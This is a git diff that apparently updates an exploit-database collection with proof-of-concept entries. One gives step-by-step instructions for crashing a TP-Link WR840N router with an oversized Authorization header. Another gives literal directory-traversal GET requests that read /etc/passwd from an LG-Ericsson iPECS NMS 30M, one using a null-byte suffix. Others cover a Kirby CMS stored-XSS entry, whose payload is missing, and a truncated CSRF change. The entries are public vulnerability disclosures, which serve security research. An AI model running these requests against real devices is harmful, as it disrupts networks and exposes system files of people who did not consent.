diff --git a/exploits/hardware/dos/45168.txt b/exploits/hardware/dos/45168.txt new file mode 100644 index 000000000..6d7d9f27c --- /dev/null +++ b/exploits/hardware/dos/45168.txt @@ -0,0 +1,22 @@ +# Exploit Title:- TP-Link Wireless N Router WR840N - Denial of Service (PoC) +# Date: 2018-08-05 +# Vendor Homepage: https://www.tp-link.com/ +# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q +# Version: TP-Link Wireless N Router WR840N +# Category: Hardware +# Exploit Author: Aniket Dinda +# Tested on: Windows 10 +# Web: https://hackingvila.wordpress.com +# CVE: N/A + +# Proof Of Concept: + +1- First connect to this network. +2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser. +3- Go to Quick setup. +4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string. +5- Now we paste a string consisting of 2000 zeros. +6- Then forward the connection. +7- Then your router automatically logout and net connection will be gone. + +You have to reboot your router before it becomes available again. \ No newline at end of file diff --git a/exploits/hardware/webapps/45021.txt b/exploits/hardware/webapps/45021.txt index 59a3dc5b9..4dcbbbadf 100644 --- a/exploits/hardware/webapps/45021.txt +++ b/exploits/hardware/webapps/45021.txt @@ -4,6 +4,7 @@ # Exploit Author: Safak Aslan # Software Link: http://www.celalink.com # Version: 2.7.1.6 +# CVE: 2018-15137 # Authentication Required: No # Tested on: Windows diff --git a/exploits/linux/webapps/45167.txt b/exploits/linux/webapps/45167.txt new file mode 100644 index 000000000..3130d8233 --- /dev/null +++ b/exploits/linux/webapps/45167.txt @@ -0,0 +1,24 @@ +# Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal +# Shodon Dork: iPECS CM +# Exploit Author: Safak Aslan +# Software Link: www.ipecs.com +# Version: 30M (System) +# Authentication Required: No +# Tested on: Linux +# CVE: N/A + +# Description +# The directory traversal was detected on LG-Ericsson's iPECS product that +# can be exploited to reach sensitive info on the vulnerable system. +# Ericsson-LG iPECS NMS 30M allows directory traversal via +# ipecs-cm/download?filename=../ URIs. + +# The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd. +# By the sending of the below GET request, it is possible to reach configuration files directly. + +targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data + +# The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg. +# By the sending of the below GET request, it is possible to reach configuration files directly. + +targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg \ No newline at end of file diff --git a/exploits/php/webapps/45068.txt b/exploits/php/webapps/45068.txt new file mode 100644 index 000000000..fca0fe9d8 --- /dev/null +++ b/exploits/php/webapps/45068.txt @@ -0,0 +1,20 @@ +# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting +# Date: 2018-07-22 +# Exploit Author: Zaran Shaikh +# Version: 2.5.12 +# CVE : NA +# Category: Web Application + +# Description +# The application allows user injected payload which can lead to Stored +# Cross Site Scripting. + +# Proof of Concept +# 1. Visit the application as low priv user +# 2. Go to add page option +# 3. Under title, enter any XSS payload like: + + + +# 4. Upon the payload being injected, the subsequent page is triggered +# with XSS \ No newline at end of file diff --git a/exploits/php/webapps/45154.html b/exploits/php/webapps/45154.html index 244a61a36..612df387d 100644 --- a/exploits/php/webapps/45154.html +++ b/exploits/php/webapps/45154.html @@ -14,7 +14,7 @@ the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning t
-